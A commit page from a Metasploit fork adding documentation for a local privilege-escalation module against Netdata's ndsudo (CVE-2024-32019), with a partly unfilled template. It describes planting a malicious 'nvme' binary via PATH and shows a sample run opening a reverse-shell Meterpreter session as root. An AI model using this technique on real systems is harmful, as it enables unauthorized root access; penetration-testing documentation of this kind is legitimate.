adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adds documentation, adds check method

Browse Source
This commit is contained in:
Martin Sutovsky
2025-08-11 12:25:33 +02:00
parent 936e68eb2e
commit d219efc0ac
2 changed files with 81 additions and 61 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md
+62
View File
@@ -0,0 +1,62 @@
## Vulnerable Application
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
files, as well as instructions on installing/configuring the environment if it is different than a
standard install. Much of this will come from the PR, and can be copy/pasted.
Installation steps:
1. `sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev libsystem-dev liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev`
1. `wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz`
1. `gunzip netdata-latest.tar.gz`
1. `tar -xf netdata-latest.tar`
1. `cd netdata-v1.45.0-8-g5803c7766/`
1. `sudo `
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use [module path]`
1. Do: `run`
1. You should get a shell.
## Options
### WritableDir
A path where malicious `nvme` binary will be stored. This path will be later prepended to `$PATH` variable to achieve privilege escalation.
### NdsudoPath
A path to `ndsudo` binary.
## Scenarios
```
msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable binary detected
[*] Creating malicious file at /tmp/nvme
[*] Writing '/tmp/nvme' (250 bytes) ...
[*] Executing..
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.200
[+] Deleted /tmp/nvme
[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.5.134.200
OS : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```